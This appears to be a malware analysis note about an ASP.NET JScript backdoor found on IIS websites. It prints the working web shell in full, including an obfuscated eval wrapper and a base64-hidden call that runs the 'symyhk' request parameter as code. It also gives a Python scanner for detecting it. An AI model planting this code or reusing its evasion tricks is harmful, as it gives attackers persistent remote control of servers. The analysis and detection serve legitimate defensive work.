JScript ASP.NET Backdoor

Labs Note

Backdoors can be simple and powerful at the same time. They are also commonly found alongside any other kind of infection: they give the attacker persistent unauthorized access to the server, so even after you clean every piece of visible malicious content from your website, they can be used to reinfect it again and again.

Here is a small example of an ASP.NET backdoor in a website running on IIS:

<script runat="server" language="JScript">
function popup(str) {
    // the word "unsafe" is assembled from fragments so it never appears literally in the file
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;   // a == "unsafe"
    // JScript .NET eval(expression, "unsafe") evaluates str with the caller's permissions
    var b = eval(str, a);
    return (b);
}
</script>

The code above evaluates whatever JScript you pass in through the str parameter. Note the second argument to eval: in JScript .NET, eval(expression, "unsafe") runs the evaluated code in the same security context as the calling code instead of the default restricted context. That is also why the literal "unsafe" is built from the fragments "u", "ns" and "afe" rather than written out, so a simple string search for it finds nothing.

The code above does nothing on its own: the declared popup function has to be called from somewhere. Scroll down the file, past the legitimate page content, and you will find the call, hidden behind base64 encoding:

popup(popup(System.Text.Encoding.Default.GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJzeW15aGsiXQ=="))));

The popup function is called twice. The base64 string decodes to Request.Item["symyhk"]; the inner call evaluates that expression and returns the value of the symyhk request parameter, and the outer call evaluates that value as JScript code, so anything the attacker sends in symyhk runs on the server. Because the HttpRequest.Item indexer looks the name up in the query string, form fields, cookies and server variables, the payload does not have to be visible in the URL: a POST body or a cookie works just as well, so do not expect to find it in the IIS logs.
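A small scanner for the three traits described above, added here as an example (it is not Sucuri's tool and not part of the original note). It assumes the file has already been read into a Python string and looks for a server-side script that wraps a two-argument eval, a nested wrapper(wrapper(...)) call, and base64 literals that decode to a Request[...] lookup. The sample file is the page's own snippet reassembled into one document; the regexes are deliberately loose but will still miss variants that obfuscate differently.

```python
import base64
import re

# Constructed sample: the backdoor shown on this page, reassembled into one file.
SAMPLE = (
    '<script runat="server" language="JScript">function popup(str) '
    '{var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}'
    '</script>\n'
    '<html><body><p>legitimate page content</p></body></html>\n'
    'popup(popup(System.Text.Encoding.Default.GetString('
    'System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJzeW15aGsiXQ=="))));\n'
)

# Server-side script blocks and the functions defined in them (bodies without nested braces).
SERVER_SCRIPT = re.compile(r'<script[^>]*runat\s*=\s*"server"[^>]*>(.*?)</script>', re.I | re.S)
FUNC_DEF = re.compile(r'\bfunction\s+(\w+)\s*\(([^)]*)\)\s*\{(.*?)\}', re.S)
# eval() with a second argument: in JScript .NET that is the security-context override.
EVAL_TWO_ARGS = re.compile(r'\beval\s*\(\s*[^,()]+,\s*[^()]+\)')
# Quoted base64-looking literals long enough to be worth decoding.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
# Request["name"] / Request.Item["name"] inside a decoded payload.
REQUEST_PARAM = re.compile(r'\bRequest(?:\.Item)?\s*\[\s*"([^"]+)"\s*\]')


def decode_b64_literals(text):
    """Return (literal, decoded) pairs for quoted strings that decode to printable ASCII."""
    found = []
    for m in B64_LITERAL.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or binary: skip it
        if decoded.isprintable():
            found.append((m.group(1), decoded))
    return found


def scan(text):
    """Collect the traits of this backdoor: eval wrappers, double eval, base64-hidden params."""
    report = {"eval_wrappers": [], "double_eval": [], "hidden_params": []}
    for block in SERVER_SCRIPT.finditer(text):
        for name, params, body in FUNC_DEF.findall(block.group(1)):
            if EVAL_TWO_ARGS.search(body):
                report["eval_wrappers"].append(name)
    for name in report["eval_wrappers"]:
        # wrapper(wrapper(...)): the inner call resolves the parameter, the outer one runs it
        pattern = r'\b' + re.escape(name) + r'\s*\(\s*' + re.escape(name) + r'\s*\('
        if re.search(pattern, text):
            report["double_eval"].append(name)
    for literal, decoded in decode_b64_literals(text):
        for param in REQUEST_PARAM.findall(decoded):
            # the parameter name is what to hunt for in request bodies and cookies
            report["hidden_params"].append((param, decoded))
    return report


def is_backdoor(report):
    """Flag a file when an eval wrapper and a base64-hidden request lookup coexist."""
    return bool(report["eval_wrappers"]) and bool(report["hidden_params"])


if __name__ == "__main__":
    result = scan(SAMPLE)
    print(result)
    print("backdoor:", is_backdoor(result))
```

On the sample this reports popup as the eval wrapper, popup(popup(...)) as the double eval, and symyhk as the hidden parameter. Run it over every .aspx, .asp and .ascx under the web root, and feed the reported parameter names into a search of the raw request bodies if you capture them, since the query string in the IIS log is not enough.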

This technique is used to reinfect websites running on IIS. In the case this code came from, the main default.asp was being overwritten with spam: no matter how many times default.asp was restored, the malicious code reappeared in the file until the backdoor itself was found and removed. If you need help cleaning it up and protecting your website, let us know.
